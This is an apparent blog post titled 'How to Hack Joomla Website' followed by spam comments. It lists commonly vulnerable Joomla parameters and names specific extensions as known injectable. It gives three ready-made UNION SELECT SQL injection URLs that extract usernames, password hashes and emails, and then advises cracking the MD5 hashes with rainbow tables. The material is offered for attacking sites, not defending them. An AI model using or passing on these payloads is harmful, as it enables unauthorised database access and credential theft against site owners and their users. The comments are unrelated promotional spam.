How to Hack Joomla Website? Joomla SQL Injection Example
Learn Joomla Hacking by Valentin
The probably most common case for hacked Joomla websites is that a SQL injection vulnerability was exploited. A typical URL which is affected by this type of vulnerability looks like this:
index.php?option=com_blabla&category=5&Item=2
Typically the following parameters are vulnerable:
- cat, category, kat, categories, kats, cats
- id, userid, katid, catid
- sometimes also Item, entry, page
You can find out if a parameter is vulnerable when you change its value from e.g. category=5 to category='.
Typically the following parameters are vulnerable:
- cat, category, kat, categories, kats, cats
- id, userid, katid, catid
- sometimes also Item, entry, page
You can find out if a parameter is vulnerable when you change its value from e.g. category=5 to category='.
Press enter and look for MySQL errors in the website. If you find one, you might have discovered a SQL inkjection vulnerability.
In order to give you a better understanding and feeling of how vulnerable URLs might look like, I just show you some URLs which are known to be vulnerable (I discovered them):
URL: index.php?option=com_jp_jobs&view=detail&id=1
Vulnerable parameter: id
URL: index.php?option=com_mv_restaurantmenumanager&task=menu_display\
&Venue=XX&mid=XX&Itemid=XX
Vulnerable parameter: mid
URL: index.php?option=com_qpersonel&task=qpListele&katid=2
Vulnerable parameter: katid
URL: index.php?com_pandafminigames&Itemid=&task=myscores&userid=2
Vulnerable parameter: userid
URL: index.php?option=com_joltcard&Itemid=21&task=view&cardID=6
Vulnerable parameter: cardID
URL: index.php?com_bfquiztrial&view=bfquiztrial&catid=1&Itemid=62
Vulnerable parameter: catid
URL: index.php?com_golfcourseguide&view=golfcourses&cid=1&id=79
Vulnerable parameter: id
URL: index.php?option=com_nkc&view=insc&lang=en&gp=10
Vulnerable parameter: gp
Notice how many parameters look familiar to you? Yes, I mentioned them
earlier as well-known parameters which are affected on regular
basis :)
Since every Joomla database contains the same structure (like the same
tables etc.), we know enough to inject a SQL statement:
Example #1:
index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+\
SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(\
username, password)--
Example #2:
index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=XX+\
AND+1=2+UNION+SELECT+concat(password),2,concat(password),4,5,6,7,\
8,9,10,11,12--
Example #3:
index.php?option=com_jp_jobs&view=detail&id=1+AND+1=2+UNION+SELECT+\
group_concat(0x503077337220743020743368206330777321,name,username,\
password,email,usertype,0x503077337220743020743368206330777321)--
The selected information will be shown within the website.
Select a username and password from the table and try to crack the
MD5 hash with the help of raindbow tables.
SQL injections in Joomla give us so much freedom as we can get. You can
select everything you want from the database, and if you are lucky,
there are also other tables in the databases which do not belong
to Joomla but still contain some very interesting information.
I have been looking the World Wide Web for this information. This article is very informative. Thanks for sharing your excellent views on how to hack joomla website.
ReplyDeletewebsite design
Modules are one of the main features of Joomla for many users. They allow website developers and owners to add user-friendly functionality like login boxes without additional coding.
ReplyDeleteWeb Designing Bangalore | Website Development Company Bangalore
I could not believe this coding would helpful to hack the Joomla based websites.
ReplyDeleteWeb Design Companies | Web Designing Company
The importance of having a website is to gain additional support for something others might not understand or realize existed.
ReplyDeleteWeb Design Services India | Web Design Companies Bangalore
I really glad to read all the information of this blog because of it proving such a essential tips regarding web development.
ReplyDeleteResponsive Design Companies | Web Development Companies